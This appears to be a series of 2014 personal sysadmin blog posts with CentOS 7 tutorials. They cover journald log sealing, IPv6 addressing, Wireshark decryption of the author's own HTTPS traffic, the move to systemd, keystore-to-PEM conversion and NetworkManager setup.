
Sunday, October 12, 2014

Enable FSS in journald and verify using journalctl

Last time we learned the basics of journalctl; today we will enable FSS in journald.

Forward Secure Sealing, or FSS, allows applications to cryptographically "seal" the system logs at regular time intervals, so that if your machine is hacked the attacker cannot alter log history (though they can still delete it entirely). It works by generating a key pair: a "sealing key" and a "verification key".

Read more at https://eprint.iacr.org/2013/397

Okay, let's set it up. We will use CentOS 7 for this exercise.

As root, let's setup the keys.
[root@centos7-test1 ~]# journalctl --setup-keys
/var/log/journal is not a directory, must be using persistent logging for FSS.

Hmm, not possible, because /run is mounted on tmpfs. We will now enable persistent storage for journald.

  1. as root, create directory # mkdir -p /var/log/journal 

  2. edit /etc/systemd/journald.conf and uncomment the following.

    1. Storage=persistent

    2. Seal=yes



  3. restart journald using command systemctl restart systemd-journald 

  4. Rerun command journalctl --setup-keys. See screenshot below.
    journald-fss

  5. Now we verify the log using command
    [root@centos7-test1 ~]# journalctl --verify
    PASS: /var/log/journal/e25a4e0b618f43879af033a74902d0af/system.journal



Looks good. One thing I am not sure about is the verification key: even when a different verification key is supplied, the check still passes. Presumably it would fail if the log had been tampered with.
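For reference, the verification key printed by --setup-keys can also be passed explicitly. A minimal sketch; the key below is a made-up placeholder, substitute the one printed during your own setup.

[root@centos7-test1 ~]# journalctl --verify --verify-key=xxxxxx-xxxxxx-xxxxxx-xxxxxx/xxxxxx-xxxxxx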

Saturday, October 11, 2014

Learning IPv6

Recently I was fortunate enough to enable IPv6 on my router, and all connected devices now have IPv6 addresses. You may ask: why would one want to switch to IPv6?

Let's start simple: look at the graph at https://www.google.com/intl/en/ipv6/statistics.html ; there has been a growing trend in IPv6 adoption since mid-2010. If that's not convincing enough to enable IPv6 on the router, then read on. I will explain based on the article found here.

First, what is IPv6?

Internet Protocol version 6 (IPv6) is the latest version of the Internet Protocol (IP), the communications protocol that provides an identification and location system for computers on networks and routes traffic across the Internet. IPv6 was developed by the Internet Engineering Task Force (IETF) to deal with the long-anticipated problem of IPv4 address exhaustion.

Because the IPv4 address space is all but exhausted at current usage trends, new devices will soon be unable to obtain a unique public address from the IPv4 pool.

Below is a point-form summary of IPv6 facts.

  •  As of June 2014, the percentage of users reaching Google services with IPv6 surpassed 4% for the first time.

  • IPv6 uses a 128-bit address, allowing 2^128, or approximately 3.4 × 10^38 addresses, whilst IPv4 uses 32-bit addresses and provides only about 4.3 billion.

  • IPv4 and IPv6 are not interoperable, and thus adoption has been slow. To expedite adoption, transition mechanisms have been devised to permit communication between IPv4 and IPv6 hosts.

  • IPv6 was first formally described in Internet standard document RFC 2460, published in December 1998.

  • IPv6 simplifies aspects of address assignment (stateless address autoconfiguration), network renumbering and router announcements when changing network connectivity providers.

  • IPv6 simplifies processing of packets by routers by placing the responsibility for packet fragmentation into the end points.

  • The standard size of a subnet in IPv6 is 2^64 addresses, the square of the size of the entire IPv4 address space.

  • IPv6 does not implement traditional IP broadcast, i.e. the transmission of a packet to all hosts on the attached link using a special broadcast address, and therefore does not define broadcast addresses. In IPv6, the same result can be achieved by sending a packet to the link-local all-nodes multicast group at address ff02::1, which is analogous to IPv4 multicast to address 224.0.0.1 (see the example after this list).

  • The IPv6 packet header has a fixed size (40 octets).

  • IPv4 limits packets to 65535 (2^16−1) octets of payload. An IPv6 node can optionally handle packets over this limit, referred to as jumbograms, which can be as large as 4294967295 (2^32−1) octets.

  • In the Domain Name System, hostnames are mapped to IPv6 addresses by AAAA resource records, so-called quad-A records.
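For instance, you can reach that all-nodes multicast group directly. A quick sketch; the interface name wlan0 is an assumption, substitute your own.

$ ping6 -I wlan0 ff02::1

Every IPv6 host on the local link should answer (duplicate replies, one per host, are expected).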


Ipv6_header

IPv6 addresses are represented as 8 groups of four hexadecimal digits separated by colons, for example 2001:0db8:85a3:0042:1000:8a2e:0370:7334, but methods of abbreviation of this full notation exist.  Each group is written as 4 hexadecimal digits and the groups are separated by colons (:). IPv6 unicast addresses other than those that start with binary 000 are logically divided into two parts: a 64-bit (sub-)network prefix, and a 64-bit interface identifier.

Ipv6_address_leading_zeros

For convenience, an IPv6 address may be abbreviated to shorter notations by application of the following rules, where possible.

  • One or more leading zeroes from any groups of hexadecimal digits are removed; this is usually done to either all or none of the leading zeroes. For example, the group 0042 is converted to 42.

  • Consecutive sections of zeroes are replaced with a double colon (::). The double colon may only be used once in an address, as multiple use would render the address indeterminate.


An example of application of these rules:

  • Initial address: 2001:0db8:0000:0000:0000:ff00:0042:8329

  • After removing all leading zeroes: 2001:db8:0:0:0:ff00:42:8329

  • After omitting consecutive sections of zeroes: 2001:db8::ff00:42:8329


The loopback address, 0000:0000:0000:0000:0000:0000:0000:0001, may be abbreviated to ::1 by using both rules.

Stateless Autoconfiguration

IPv6 lets any host generate its own IP address and check if it's unique in the scope where it will be used. IPv6 addresses consist of two parts. The leftmost 64 bits are the subnet prefix to which the host is connected, and the rightmost 64 bits are the identifier of the host's interface on the subnet. This means that the identifier need only be unique on the subnet to which the host is connected, which makes it much easier for the host to check for uniqueness on its own.

|Subnet Prefix 64 bits | Interface identifier 64 bits |

The MAC address is used to derive the interface's link-local address. I have written a blog post on how to do just that; please read it here.

With the link-local address derived, drop the fe80 prefix and concatenate the remainder with the LAN's IPv6 network prefix.

So, for example, with MAC address 4c:33:22:11:aa:ee:

Derived link-local address: fe80::4e33:22ff:fe11:aaee

Public IP: 2001:e68:5424:d2dd:4e33:22ff:fe11:aaee, where 2001:e68:5424:d2dd is the LAN IPv6 prefix assigned by the router and 4e33:22ff:fe11:aaee is the link-local address without the fe80 prefix.

Dual IP stack implementation

Dual-stack (or native dual-stack) refers to side-by-side implementation of IPv4 and IPv6. That is, both protocols run on the same network infrastructure, and there's no need to encapsulate IPv6 inside IPv4 (using tunneling) or vice-versa. Dual-stack is defined in RFC 4213.

Dual-stack should only be considered a transitional technique to facilitate the adoption and deployment of IPv6, as it has some major drawbacks: it roughly doubles the security exposure, since threats against both IPv4 and IPv6 now apply to the same infrastructure, and it burdens the global networking infrastructure with dramatically increased traffic. The ultimate objective is to deploy a single IPv6 stack globally.

There is more to be found on Wikipedia, http://en.wikipedia.org/wiki/IPv6 , but the above should get you started. It worked for me the first time I enabled IPv6 and has worked wonders since.

Friday, October 10, 2014

Derive IPv6 link-local address for network interface

When you show the interface configuration using the ip command, you will notice there is an inet6 address starting with fe80. Today we will learn what this is and how this address is derived. Example below:
user@localhost:~$ ip addr show wlan0
3: wlan0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP qlen 1000
link/ether 4c:33:22:11:aa:ee brd ff:ff:ff:ff:ff:ff
inet 192.168.133.50/24 brd 192.168.133.255 scope global wlan0
valid_lft forever preferred_lft forever
inet6 2001:e68:5424:d2dd:4e33:22ff:fe11:aaee/64 scope global dynamic
valid_lft 86399sec preferred_lft 14399sec
inet6 fe80::4e33:22ff:fe11:aaee/64 scope link
valid_lft forever preferred_lft forever

So first, what is Link-local address?

In a computer network, a link-local address is a network address that is valid only for communications within the network segment (link) or the broadcast domain that the host is connected to.

Link-local addresses are usually not guaranteed to be unique beyond a single network segment. Routers therefore do not forward packets with link-local addresses.

For protocols that have only link-local addresses, such as Ethernet, hardware addresses that the manufacturer delivers in network circuits are unique, consisting of a vendor identification and a serial identifier.

Link-local addresses for IPv4 are defined in the address block 169.254.0.0/16, in CIDR notation. In IPv6, they are assigned with the fe80::/10 prefix.

So it is an address that is valid only within a local segment of the network and is not routed beyond the router.

With this said, let's calculate the link-local address.

1. take the mac address from the ip command output.
from above example 4c:33:22:11:aa:ee

2. add ff:fe in the middle of the current mac address.
4c:33:22:ff:fe:11:aa:ee

3. reformat to IPv6 notation by concatenating each pair of octets into one 16-bit group.
4c33:22ff:fe11:aaee

4. convert the first octet from hexadecimal to binary
4c -> 01001100

5. invert the bit at position 6 (counting from the left, with the first bit as position 0).
01001100 -> 01001110

6. convert the octet from step 5 back to hexadecimal
01001110 -> 4e

7. replace the first octet with the newly calculated value from step 6.
4e33:22ff:fe11:aaee

8. prepend the link-local prefix
fe80::4e33:22ff:fe11:aaee
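These eight steps can be scripted. Below is a minimal bash sketch, under the assumption of a colon-separated MAC address as the first argument; it reproduces the example above.

#!/bin/bash
# derive the IPv6 link-local address from a MAC address (steps 1-8 above)
mac=${1:-4c:33:22:11:aa:ee}
IFS=: read -r a b c d e f <<< "$mac"
# steps 4-6: flip the universal/local bit of the first octet
a=$(printf '%02x' $(( 0x$a ^ 0x02 )))
# steps 2-3 and 7-8: insert ff:fe in the middle, regroup, prepend fe80::
printf 'fe80::%s%s:%sff:fe%s:%s%s\n' "$a" "$b" "$c" "$d" "$e" "$f"

Running it with 4c:33:22:11:aa:ee prints fe80::4e33:22ff:fe11:aaee, matching the derivation above.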

That's it.

Sunday, September 28, 2014

Capturing ssl traffic using wireshark and analyzing it

Today we are going to study ssl using a trace from wireshark. There are a few tasks we need to carry out, summarized below.

  1. setup a web server that has ssl certificate configured.

  2. get the network traffic using wireshark.

  3. decode and analyze the network traffic using wireshark.


So first, what is SSL?

Transport Layer Security (TLS) and its predecessor, Secure Sockets Layer (SSL), are cryptographic protocols designed to provide communication security over the Internet.[1] They use X.509 certificates and hence asymmetric cryptography to authenticate the counterparty with whom they are communicating, and to exchange a symmetric key.

If you already have a web server with an ssl certificate configured, you can skip step 1. This is the documentation I used primarily. You may not succeed on the first attempt; it took me several attempts to get the ssl traffic decrypted. A word of advice: just do not give up.

1. setup a web server that has ssl certificate configured.

For this, you can either get the certificate from an authority or generate one yourself. If you do not know how, you can search online or request it in the comments; maybe in the future I will write a simple guide. Here, I assume you have the certificate ready.

In the web server, with apache httpd being the most common, edit the ssl configuration file in the apache directory. Example:
<apache httpd directory>/sites-available/default-ssl.conf

SSLCertificateFile /etc/apache2/sites-available/abc_cert.pem
SSLCertificateKeyFile /etc/apache2/sites-available/abc_private_key.pem

Change these according to where you placed the certificate and its private key. Enable this site, restart apache httpd, and you are set. I won't go into troubleshooting details if you encounter problems, as that is not the main focus of this article and is left as an exercise.

2. get the network traffic using wireshark.

Make sure the wireshark you have installed was compiled with GnuTLS. You can check using the command below; the output must list GnuTLS and Gcrypt.
$ wireshark --version | grep GnuTLS
with GnuTLS 2.12.23, with Gcrypt 1.5.3, with MIT Kerberos, with GeoIP, with
1.6.1, with libz 1.2.8, GnuTLS 2.12.23, Gcrypt 1.5.4, without AirPcap.

Now launch wireshark as root, ignoring the warnings you receive when launching it as root. Note, you can also use dumpcap when you need to capture on the server itself, e.g. $ sudo dumpcap -i wlan0 -f 'host 192.168.133.49 and tcp port 443' , but I have not verified whether decryption works with that workflow, since you still need to configure the server private key and the client (browser) session keys. That is left as another exercise.
$ sudo wireshark

Some fields in the screenshots are blacked out for obvious reasons: we want to protect the server and client. Everything should be self-explanatory once you complete the steps described here.

We will first configure the SSL protocol settings so that wireshark is able to decrypt the traffic. For that, you will need the server private key from step 1 above. To configure it, go to Edit, then Preferences... See screenshot below.

wireshark_edit_preference

A Wireshark: Preferences window pops up. In the menu on the left, expand Protocols in the tree and look for SSL. See screenshot below.

wireshark_preference_window

First, we will configure the RSA keys list. Click on the Edit... button and another window pops up. Now add the server key. There are four out of five fields you need to fill in. See the screenshot below for the final result. Here I will explain the fields.

wireshark_ssl_rsa_configuration

  • IP address: the IP address of the SSL server, in IPv4 or IPv6 format, or one of the special values any, anyipv4, anyipv6, 0.0.0.0. Put your server hostname or IP address if you know it.

  • Port: the TCP port number, or the special value start_tls or 0. A web server normally listens on port 443, and in this example I gave port 443 because the remote server listens for https traffic there.

  • Protocol: the protocol name for the decrypted network data. Popular choices are http or data. If you enter an invalid protocol name, an error message will show you the valid values. Because the http data is encrypted using ssl, we put http here.

  • Key File: the path to the RSA private key. Locate where you put the server private key on your local workstation and select the file here.

  • Password: only needed when the private key is in PKCS#12 format (typically a file with a .pfx or .p12 extension). In step 1 the server private key is in PEM format, so you can leave this field empty. Save by clicking OK, then click Apply and OK.

The next field we are going to configure is the SSL debug file. This is a file written by the ssl dissector, and I recommend you put a valid path here. You can tail this file once the capture is started and inspect it on the fly while decryption is happening. It is very helpful when your ssl decryption goes wrong, as it serves as a source of debugging information.

You should check the following fields.

  • Reassemble SSL records spanning multiple TCP segments

  • Reassemble SSL Application Data spanning multiple SSL records


Leave the fields Message Authentication Code (MAC), ignore "mac failed" and Pre-Shared-Key as they are.

For the last field, (Pre)-Master-Secret log filename, fill in the path that you will configure in the web browser environment in the next step. This is a file written by the client (the web browser in our example) containing the per-session secrets used to encrypt the data; wireshark reads this file to decrypt the traffic.

That's it for the configuration, click on Apply button and OK button.

Now open another terminal, and we will set up the environment so that the client (browser) dumps the session keys. The chromium browser will start dumping the keys to the file premaster.txt.
user@localhost:~$ export SSLKEYLOGFILE=/home/user/premaster.txt
user@localhost:~$ chromium

Now tail the ssl debug file and this premaster file in two other terminal tabs and watch the progress.

Now we will capture the traffic. To do that, click Capture in the menu, then Options... See the screenshot below. Set the configuration correctly: I checked wlan0 because this is a laptop and the https requests flow through this interface. For the capture filter, specify host followed by the IP address of the web server you configured in step 1. In this example my server IP address is 192.168.133.49, so the filter is host 192.168.133.49.

wireshark_capture_option

To start the capture, click on the Start button.

Now trigger an https call to the server from the web browser (in this example, chromium) and watch wireshark capture and decrypt the https data! Also check the terminal tabs where the debug log and premaster.txt are rolling. Click the stop button when you are satisfied with the https requests.

3. decode and analyze the network traffic using wireshark.

From step 2 above, you now have a complete ssl dump, and it is decrypted! See screenshot below. You may have noticed that the SSL data has another tab at the bottom, known as Decrypted SSL data. In this screenshot, it is 9000 bytes. Pretty awesome, I must say.

wireshark_decrypted_data

Right-click on a packet row with protocol TLSv1 and click Follow SSL Stream. It will show the encrypted ssl traffic (https) decrypted into plain http traffic.
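The same decryption can also be done from the command line with tshark, which is handy on a headless machine. A rough sketch, assuming the capture was saved to capture.pcap, the browser wrote its keys to /home/user/premaster.txt as above, and your tshark is recent enough to support the -Y display filter:

$ tshark -r capture.pcap -o ssl.keylog_file:/home/user/premaster.txt -Y http

The -o option sets the same SSL preference we configured in the GUI, and -Y http prints only the decrypted http packets.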

That's it, folks. I hope you learned something; please visit the donation page to support us.

Saturday, September 27, 2014

Study journalctl in CentOS 7

In CentOS 7, the new systemd comes with a new journaling facility, and journalctl is the tool to read it. Today we will study journalctl. First, what is journalctl?

journalctl is a client application for querying the systemd journal, which is written by systemd-journald.service.

Let's sudo to root and study journalctl through examples.
[user@localhost ~]$ sudo su -
Last login: Sat Sep 13 11:57:55 CEST 2014 on pts/0
[user@localhost ~]# journalctl
-- Logs begin at Mon 2014-09-01 14:57:19 CEST, end at Mon 2014-09-15 10:52:52 CEST. --
Sep 01 14:57:19 localhost systemd-journal[146]: Runtime journal is using 8.0M (max 2.3G, leaving 3.5G of free 23.4G, current limit 2.3G).
Sep 01 14:57:19 localhost systemd-journal[146]: Runtime journal is using 8.0M (max 2.3G, leaving 3.5G of free 23.4G, current limit 2.3G).
Sep 01 14:57:19 localhost kernel: Initializing cgroup subsys cpuset
Sep 01 14:57:19 localhost kernel: Initializing cgroup subsys cpu
Sep 01 14:57:19 localhost kernel: Initializing cgroup subsys cpuacct
Sep 01 14:57:19 localhost kernel: Linux version 3.10.0-123.6.3.el7.x86_64 (builder@kbuilder.dev.centos.org) (gcc version 4.8.2 20140120 (Red Hat 4.8.2-16) (GC
Sep 01 14:57:19 localhost kernel: Command line: BOOT_IMAGE=/vmlinuz-3.10.0-123.6.3.el7.x86_64 root=UUID=bbbbbbbb-7777-465a-993a-888888888888 ro nomodeset rd.a
Sep 01 14:57:19 localhost kernel: e820: BIOS-provided physical RAM map:
...
...
...
Sep 15 10:57:00 foo.example.com sshd[23533]: Received disconnect from 123.123.123.123: 11: disconnected by user
Sep 15 10:57:00 foo.example.com systemd-logind[1161]: Removed session 9773.
Sep 15 10:59:04 foo.example.com sshd[23813]: Accepted publickey for foobar from 132.132.132.132 port 36843 ssh2: RSA 68:68:68:68:68:86:68:68:68:68:68:68:0
Sep 15 10:59:04 foo.example.com systemd[1]: Created slice user-1005.slice.
Sep 15 10:59:04 foo.example.com systemd[1]: Starting Session 9774 of user foobar.
Sep 15 10:59:04 foo.example.com systemd-logind[1161]: New session 9774 of user foobar.
Sep 15 10:59:04 foo.example.com systemd[1]: Started Session 9774 of user foobar.
Sep 15 10:59:04 foo.example.com sshd[23813]: pam_unix(sshd:session): session opened for user foobar by (uid=0)
lines 53881-53917/53917 (END)

As you may have noticed, journalctl shows all logging from system boot up to the present moment, so there are a lot of lines and data to interpret. You will want to look into the parameters this application accepts.

If you want to show the most recent log first, pass -r. This reverses the ordering, showing the newest entries first. If you want only the newest ten lines, pass -n 10. Example: journalctl -r -n 10

To show how much disk space all these logs take, pass --disk-usage. Note that by default the journal is stored under /run/log/journal, not /var/log.

If you want to show only the log of one unit (service), pass --unit. For example, journalctl --unit=sshd will show logging for sshd only. Very neat!

Sometimes you just want to examine a certain range of dates and/or times. You can append the parameters --since and --until. For example, journalctl --since="2014-09-14 01:00:00" --until="2014-09-14 02:00:00" shows all journal entries within that one-hour window. I think this is really good for system monitoring, support, or even tracing a compromised system.

If you want the journal logs to appear in a web interface, you can convert the logging to a format the web application supports. As of this writing, journalctl supports the following output formats.

  • short: the default; generates output mostly identical to the formatting of classic syslog files, showing one line per journal entry.

  • short-iso: very similar, but shows ISO 8601 wallclock timestamps.

  • short-precise: very similar, but shows timestamps with full microsecond precision.

  • short-monotonic: very similar, but shows monotonic timestamps instead of wallclock timestamps.

  • verbose: shows the fully-structured entry items with all fields.

  • export: serializes the journal into a binary (but mostly text-based) stream suitable for backups and network transfer (see Journal Export Format[1] for more information).

  • json: formats entries as JSON data structures, one per line (see Journal JSON Format[2] for more information).

  • json-pretty: formats entries as JSON data structures, but spreads them over multiple lines to make them more readable for humans.

  • json-sse: formats entries as JSON data structures, but wraps them in a format suitable for Server-Sent Events[3].

  • cat: generates very terse output, showing only the actual message of each journal entry with no metadata, not even a timestamp.

json probably comes to mind for displaying the logging on a web interface.
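For example, to pull the ten newest sshd entries as JSON, one object per line (the sshd unit is just an illustration):

journalctl --unit=sshd -o json -n 10 -r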

There is also a feature known as Forward Secure Sealing, where the log is sealed using a sealing key and can later be verified using a verification key. Check the parameters --setup-keys, --interval, --verify and --verify-key. We won't cover FSS in this article; perhaps sometime in the future I will devote an article to setting it up.

There are many other good options that help you analyze the log with different strategies, such as -b, -p and match expressions, but this article should give you a head start. You can find more information in the journalctl manual.

Friday, September 26, 2014

transition from sysV to systemd, from chkconfig to systemctl

If you have just installed CentOS 7.0 and, as usual, run the command chkconfig
to list which processes will start on boot, you will see the following:
[root@localhost ~]# chkconfig

Note: This output shows SysV services only and does not include native
systemd services. SysV configuration data might be overridden by native
systemd configuration.

If you want to list systemd services use 'systemctl list-unit-files'.
To see services enabled on particular target use
'systemctl list-dependencies [target]'.

iprdump 0:off 1:off 2:on 3:on 4:on 5:on 6:off
iprinit 0:off 1:off 2:on 3:on 4:on 5:on 6:off
iprupdate 0:off 1:off 2:on 3:on 4:on 5:on 6:off
network 0:off 1:off 2:on 3:on 4:on 5:on 6:off
tomcat 0:off 1:off 2:off 3:off 4:off 5:off 6:off

That's odd; something has changed. SysV init has been replaced in favor of systemd, and today we are going to learn what systemd is. So what is systemd?

systemd is a system and service manager for Linux, compatible with SysV and LSB init scripts. systemd provides aggressive parallelization capabilities, uses socket and D-Bus activation for starting services, offers on-demand starting of daemons, keeps track of processes using Linux cgroups, supports snapshotting and restoring of the system state, maintains mount and automount points and implements an elaborate transactional dependency-based service control logic. It can work as a drop-in replacement for sysvinit. 

That is a very lengthy definition. If you are still not so sure, perhaps take a moment to watch a video here.



There is plenty of documentation online explaining systemd in detail, but this article targets busy people who need a solution right now. If you want more detail, search around or read the helpful links below.

So why replace sysV with systemd? What have been improved?

Lennart Poettering and Kay Sievers, the software engineers who initially developed systemd,[1] sought to surpass the efficiency of the init daemon in several ways. They wanted to improve the software framework for expressing dependencies; to allow more processing to be done concurrently or in parallel during system booting; and to reduce the computational overhead of the shell.

Systemd's initialization instructions for each daemon are recorded in a declarative configuration file rather than a shell script. For inter-process communication, systemd makes Unix domain sockets and D-Bus available to the running daemons. Systemd is also capable of aggressive parallelization.

There are several tools to manage systemd.

  • systemctl:
    used to introspect and control the state of the systemd system and service manager

  • systemd-cgls:
    recursively shows the contents of the selected Linux control group hierarchy in a tree

  • systemadm:
    a graphical frontend for the systemd system and service manager that allows introspection and control of systemd. Part of the systemd-gtk package. This is an early version and needs more work. Do not use it for now unless you are a developer.


Below is a table summarizing what you usually did with chkconfig and SysV commands, and the systemd command you can use as a replacement.

Sysvinit Command | Systemd Command | Notes
service frobozz start | systemctl start frobozz.service | Used to start a service (not reboot persistent)
service frobozz stop | systemctl stop frobozz.service | Used to stop a service (not reboot persistent)
service frobozz restart | systemctl restart frobozz.service | Used to stop and then start a service
service frobozz reload | systemctl reload frobozz.service | When supported, reloads the config file without interrupting pending operations.
service frobozz condrestart | systemctl condrestart frobozz.service | Restarts if the service is already running.
service frobozz status | systemctl status frobozz.service | Tells whether a service is currently running.
ls /etc/rc.d/init.d/ | systemctl list-unit-files --type=service (preferred), or ls /lib/systemd/system/*.service /etc/systemd/system/*.service | Used to list the services that can be started or stopped, and to list all the services and other units.
chkconfig frobozz on | systemctl enable frobozz.service | Turn the service on, for start at next boot, or other trigger.
chkconfig frobozz off | systemctl disable frobozz.service | Turn the service off for the next reboot, or any other trigger.
chkconfig frobozz | systemctl is-enabled frobozz.service | Used to check whether a service is configured to start or not in the current environment.
chkconfig --list | systemctl list-unit-files --type=service (preferred), or ls /etc/systemd/system/*.wants/ | Print a table of services that lists which runlevels each is configured on or off.
chkconfig frobozz --list | ls /etc/systemd/system/*.wants/frobozz.service | Used to list what levels this service is configured on or off.
chkconfig frobozz --add | systemctl daemon-reload | Used when you create a new service file or modify any configuration.
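As a quick worked example, here is the migration of a typical workflow; sshd is used purely as an illustration.

systemctl status sshd.service        # was: service sshd status
systemctl enable sshd.service        # was: chkconfig sshd on
systemctl is-enabled sshd.service    # was: chkconfig sshd
systemctl daemon-reload              # was: chkconfig sshd --add (after adding or editing unit files)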

Runlevels/targets

Systemd has a concept of targets, which serve a similar purpose to runlevels but act a little differently. Each target is named instead of numbered and is intended to serve a specific purpose.

Sysvinit Runlevel | Systemd Target | Notes
0 | runlevel0.target, poweroff.target | Halt the system.
1, s, single | runlevel1.target, rescue.target | Single user mode.
2, 4 | runlevel2.target, runlevel4.target, multi-user.target | User-defined/site-specific runlevels. By default, identical to 3.
3 | runlevel3.target, multi-user.target | Multi-user, non-graphical. Users can usually log in via multiple consoles or via the network.
5 | runlevel5.target, graphical.target | Multi-user, graphical. Usually has all the services of runlevel 3 plus a graphical login.
6 | runlevel6.target, reboot.target | Reboot.
emergency | emergency.target | Emergency shell.

Below is a summary of the commands you will (hopefully) use.

  • systemctl isolate multi-user.target
    To change the target/runlevel, to switch to runlevel 3

  • systemctl set-default <name of target>.target
    graphical.target is the default. You might want multi-user.target for the equivalent of non graphical (runlevel 3) from sysv init.

  • systemctl get-default
    to show the current target/runlevel


Note, there are several changes you should keep in mind.
* systemd does not use the /etc/inittab file.
* change the number of gettys in /etc/systemd/logind.conf
* unit files are now stored in /usr/lib/systemd/system/

That's it, I hope you get a basic understanding and will be able to start using systemd.

Sunday, September 14, 2014

How to convert java keystore to format apache httpd understand

If you received a Java keystore file from a Certificate Authority and want to use the cert for apache httpd ssl, you will meet failure, at least I did. So today I will share my findings on how to convert a Java keystore file into PEM format, which apache httpd understands.

So how do you know whether a certificate signed by a CA is a Java keystore? Simple: just check the content using keytool. Keytool is an app that comes with the Java environment.
$ keytool -list -keystore abc.jks
Enter keystore password:

Keystore type: JKS
Keystore provider: SUN

Your keystore contains 1 entry

ABC_Certificate, Aug 19, 2013, PrivateKeyEntry,
Certificate fingerprint (MD5): 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00

As you can read above, this is a valid Java keystore file, and we will now convert it to an intermediate format, PKCS#12, first. We will use keytool again to do the conversion.
$ keytool -importkeystore -srckeystore abc.jks -destkeystore abc.p12 -srcalias ABC_Certificate -srcstoretype jks -deststoretype pkcs12
Enter destination keystore password:
Re-enter new password:
Enter source keystore password:
$

The output abc.p12 is the certificate in PKCS#12 format, and now we are ready to convert it to PEM. We will use openssl to do this conversion.
$ openssl pkcs12 -in abc.p12 -out abc.pem
Enter Import Password:
MAC verified OK
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:
$

You can basically use abc.pem for both the SSLCertificateFile and SSLCertificateKeyFile fields, but unfortunately when apache httpd is restarted, it will ask for the private key passphrase. With the following steps, we will remove the passphrase from the private key.

Remove the passphrase so that when the apache httpd instance is restarted, it will not ask for a password.
$ openssl rsa -in abc.pem -out abc_private_key.pem
Enter pass phrase for abc.pem:
writing RSA key
$ openssl x509 -in abc.pem >>abc_cert.pem

As you have noticed, you now end up with the certificate private key and the certificate. Move these two files, abc_private_key.pem and abc_cert.pem, to a directory on the apache httpd server and change the ssl configuration in apache httpd.
SSLCertificateFile    /path/to/the/directory/contain/abc_cert.pem
SSLCertificateKeyFile /path/to/the/directory/contain/abc_private_key.pem
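As an optional sanity check before restarting httpd, you can confirm the key and certificate belong together by comparing their public-key moduli; identical digests mean they match. A sketch, assuming an RSA key as produced above:

$ openssl rsa -noout -modulus -in abc_private_key.pem | openssl md5
$ openssl x509 -noout -modulus -in abc_cert.pem | openssl md5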

That's it, I hope it works for you too.

Friday, September 12, 2014

Understand basic network configuration in CentOS 7

With the recent release of CentOS7, today we are going to check out the basic network configuration. My usual quick command, ifconfig.
[root@localhost ~]# ifconfig
-bash: ifconfig: command not found

It seems ifconfig is no longer there; note that if you upgrade from CentOS 6.x, you should be aware of this. If you are going to configure network interfaces, start getting familiar with the ip command. If you still want ifconfig, you can install the net-tools package.
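For reference, here are rough ip equivalents of the most common ifconfig/route invocations; eth0 is just an example interface name.

ip addr show           # list interfaces and addresses, like ifconfig -a
ip link set eth0 up    # bring an interface up, like ifconfig eth0 up
ip route show          # display the routing table, like route -n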

Let's restart the network service.
[root@centos7-test1 network-scripts]# service network restart
Restarting network (via systemctl): [ OK ]
[root@centos7-test1 network-scripts]# service network status
Configured devices:
lo eth0
Currently active devices:
lo eth0
[root@centos7-test1 init.d]# systemctl restart network
[root@centos7-test1 init.d]# systemctl status network
network.service - LSB: Bring up/down networking
Loaded: loaded (/etc/rc.d/init.d/network)
Active: active (exited) since Tue 2014-07-15 14:33:28 CEST; 13s ago
Process: 11597 ExecStop=/etc/rc.d/init.d/network stop (code=exited, status=0/SUCCESS)
Process: 11753 ExecStart=/etc/rc.d/init.d/network start (code=exited, status=0/SUCCESS)

Jul 15 14:33:27 centos7-test1 network[11753]: Bringing up loopback interface: Could not load file '/etc/sysconfig/network-scripts/ifcfg-lo'
Jul 15 14:33:27 centos7-test1 network[11753]: Could not load file '/etc/sysconfig/network-scripts/ifcfg-lo'
Jul 15 14:33:27 centos7-test1 network[11753]: Could not load file '/etc/sysconfig/network-scripts/ifcfg-lo'
Jul 15 14:33:28 centos7-test1 network[11753]: Could not load file '/etc/sysconfig/network-scripts/ifcfg-lo'
Jul 15 14:33:28 centos7-test1 network[11753]: [ OK ]
Jul 15 14:33:28 centos7-test1 network[11753]: Bringing up interface eth0: Connection successfully activated (D-Bus active path: /org/...tion/3)
Jul 15 14:33:28 centos7-test1 network[11753]: [ OK ]
Jul 15 14:33:28 centos7-test1 systemd[1]: Started LSB: Bring up/down networking.
Hint: Some lines were ellipsized, use -l to show in full.

Notice that service management is now done via systemctl; CentOS 7 uses systemd in place of SysV. Also notice the configuration file ifcfg-lo could not be loaded? This issue has been filed here.

Upstream has changed the default networking service to NetworkManager, a dynamic network control and configuration daemon that attempts to keep network devices and connections up and active when they are available.

If it is not installed for any reason (it should be, as it comes with the default installation), you can run the following commands:
# # install it
# yum install NetworkManager
# # ensure the NetworkManager service is started every time the system boots up.
# systemctl enable NetworkManager
# # manual start for now.
# systemctl start NetworkManager
# # check the status.
[root@centos7-test1 ~]# systemctl status NetworkManager
NetworkManager.service - Network Manager
Loaded: loaded (/usr/lib/systemd/system/NetworkManager.service; enabled)
Active: active (running) since Tue 2014-07-15 13:39:18 CEST; 3h 40min ago
Main PID: 679 (NetworkManager)
CGroup: /system.slice/NetworkManager.service
├─ 679 /usr/sbin/NetworkManager --no-daemon
└─11896 /sbin/dhclient -d -sf /usr/libexec/nm-dhcp-helper -pf /var/run/dhclient-eth0.pid -lf /var/lib/NetworkManager/dhclient-55911be2-9763-471f...

Jul 15 17:05:21 centos7-test1 NetworkManager[679]: bound to 192.168.0.116 -- renewal in 3581 seconds.
Jul 15 17:05:21 centos7-test1 NetworkManager[679]: <info> (eth0): DHCPv4 state changed renew -> renew
Jul 15 17:05:21 centos7-test1 NetworkManager[679]: <info> address 192.168.0.116
Jul 15 17:05:21 centos7-test1 NetworkManager[679]: <info> plen 24 (255.255.255.0)
Jul 15 17:05:21 centos7-test1 NetworkManager[679]: <info> gateway 192.168.0.1
Jul 15 17:05:21 centos7-test1 NetworkManager[679]: <info> server identifier 192.168.0.1
Jul 15 17:05:21 centos7-test1 NetworkManager[679]: <info> lease time 7200
Jul 15 17:05:21 centos7-test1 NetworkManager[679]: <info> nameserver '192.168.0.1'
Jul 15 17:05:21 centos7-test1 NetworkManager[679]: <info> nameserver '8.8.8.8'
Jul 15 17:05:21 centos7-test1 NetworkManager[679]: <info> domain name 'PowerRanger'

If you are configuring manually over a remote session, you can use the command nmtui, a simple curses-based text user interface. If you want to configure interfaces from a script, better to use the ip or nmcli commands. For more information, you can read here.

That's it for this article. I would like to thank my buddy for being kind enough to let me ssh in and study CentOS 7 on his host. :) You know who you are! Dankeschön!

